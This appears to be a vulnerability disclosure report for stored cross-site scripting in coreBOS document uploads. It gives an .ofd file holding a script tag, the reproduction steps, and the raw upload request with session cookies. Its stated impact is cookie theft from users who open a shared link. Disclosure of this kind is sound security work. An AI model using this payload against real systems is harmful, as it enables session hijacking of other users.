Description

In document feature, you can upload a file .ofd which can have xss

Proof of Concept

// xss.ofd
<script>alert(1)</script>

Step 1: Go to Support -> Documents

Step 2: Click Create Documents

Step 3: At the Download type, choose Internal. Upload file xss.ofd above.

Step 4: Go to that file link, such as: https://demo.corebos.com/storage/2022/March/week4/43911_xss.ofd. You will see alert here.

Request:

POST /index.php HTTP/2

Host: demo.corebos.com

Cookie: democoreboscom=792a9ee53093e76746fd348bc7a03e33; ck_login_id_vtiger=7; timezone=0; corebos_browsertabID=9866295214548453 Content-Length: 4287

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://demo.corebos.com

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryN1dAzo74J4FoIATI

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://demo.corebos.com/index.php?module=Documents&action=EditView&return_action=DetailView

Connection: close

…………………………………………………………….

------WebKitFormBoundaryN1dAzo74J4FoIATI

Content-Disposition: form-data; name="filename"; filename="xss.ofd"

Content-Type: application/octet-stream

<script>alert(1)</script>

------WebKitFormBoundaryN1dAzo74J4FoIATI

Content-Disposition: form-data; name="filename_hidden"

xss.ofd

…………………………………………………………….

Impact

An user can upload a poison file and share that link to another user to steal their cookie,...